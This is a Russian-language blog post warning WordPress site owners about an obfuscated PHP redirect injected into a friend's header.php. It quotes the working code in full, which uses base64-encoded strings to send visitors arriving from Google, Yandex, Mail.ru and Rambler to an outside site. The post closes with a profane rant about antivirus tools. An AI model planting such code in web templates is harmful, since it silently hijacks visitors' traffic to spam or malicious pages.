Сегодня у Костика на сайте Steinar.ru обнаружили в файле header.php код вируса, он перенаправлял посетителей, которые пытались перейти на этот сайт из Google на на другие левые сайты типа этого “http://magik-tunes.com/?&wmid=112″. Самое интересное, что если просто в адресной строке набрать адрес его сайта, то все нормально, но если пришли с поисковика, то перекинет на один из этих сайтов.

Вот код вируса:

<? function _879214760($i){$a=Array('SFRUUF9SRUZFUkVS','aHR0cDovL3J1em9uZXh4eC5jb20vP3VpZD1jN2FjOTA0MDhmZWNlYWNkZDg5MjBkOGZlMmUzNGE0NA==','Z29vZ2xlLnJ1','eWEucnU=','eWFuZGV4LnJ1','bWFpbC5ydQ==','cmFtYmxlcg==','TG9jYXRpb246IA==');return base64_decode($a[$i]);} ?><?php __0($_SERVER[_879214760(0)],_879214760(1));function __0($_0,$_1){if($_0!=false){$_2=array(_879214760(2),_879214760(3),_879214760(4),_879214760(5),_879214760(6));foreach($_2 as $_3){if(strstr($_0,$_3)){header(_879214760(7) .$_1);die();}}}} ?>

Так что рекомендую всем кто держит сайты проверить файлик header.php на наличие в самом начале подобного текста и если он там, то удалить его. Главный вопрос, который меня мучает – это как им падлам удалось его туда запихнуть? Я понимаю, если бы он не обновлял движок и сидел бы на доисторической версии, но у него установлена самая на сегодня последняя версия WordPress 2.9.1.

Помню еще очень и очень давно, когда у меня был компьютер с 286 процессором, а потом 386, 486 и так далее, тоже существовали вирусы которые клеились к запускаемым ЕХЕ и СОМ файлам. Были спец проги, которые умели подцеплять различные трояны к программам. Такое я тоже пробовал. И еще помнится мне я даже сам писал на ассемблере вирус простенький, по книжке конечно, но размножался он на ура.

И уже тогда были антивирусы, которые умели лечить и вычленять эти вирусы и трояны из программ и при этом программы оставались работоспособными. Но теперь я просто не понимаю ничего. Теперь я еще не встречал ни одного антивируса, который бы смог вылечить хоть один файл от трояна. Че это за х…ня ваще? Они предлагают либо удалить нах.. файл с вирусом, либо засунуть его в карантин, либо просто закрыть к нему доступ! Нахера спрашивается мне это файл в карантине или с закрытым доступом, когда мне нужно что бы программа работала?

Либо программеры антивирусов совсем обленились и не хотят разбираться в том, как вычленить вирусяку из файла, либо хакеры научились настолько плотно внедрять свое дерьмо в программы, что достать их от туда можно только убив саму программу, что мне кажется маловероятным, т.к. уж слишком быстро появляется взломанный софт с трояном внутри.

Жаль, раньше хакеры ломали программы и игры с идеей о том, что информация должна быть доступна всем, теперь же только с целью наживы, а нажива – это трояны и вирусы, которые либо воруют личные данные, либо превращают ваш комп в зомби, которым потом будут пользоваться в своих грязных целях, таких как спам, ддос, и другой хрени.